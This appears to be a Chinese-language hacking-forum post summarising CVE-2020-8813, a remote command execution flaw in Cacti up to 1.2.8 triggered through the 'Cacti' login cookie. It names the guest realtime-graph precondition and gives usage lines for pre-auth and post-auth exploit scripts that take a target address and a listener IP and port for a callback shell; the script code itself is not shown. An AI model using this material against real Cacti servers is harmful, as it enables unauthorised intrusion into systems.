Shacker

POC Cacti v1.2.8 RCE(CVE-2020-8813)

Shacker已验证会员

黑客倉庫站長

贡献: 21%
JavaScript:
## 漏洞概述

漏洞点在登录的`Cookie`变量`Cacti`的值,将其改为系统命令造成RCE;

但是操作Cookie值会遇到身份验证问题,因此需开启访客页面,配合利用。

## 影响范围

```http
Cacti <= 1.28
```

## POC

暂无。编写nuclei的poc!!!

## EXP

**Pre-Auth RCE**
前提:开启来宾实时图查看权限 graph_realtime.php?action=init 中包含poller_realtime.php

```
python Cacti-preauth-rce.py x.x.x.x ListeningIP ListeningPORT(VPS监听)
```

**Post-Auth RCE**
前提:已知一个账户

```
python Cacti-postauth-rce.py x.x.x.x admin pass ListeningIP ListeningPORT
```

## 参考链接

https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
 
后退
顶部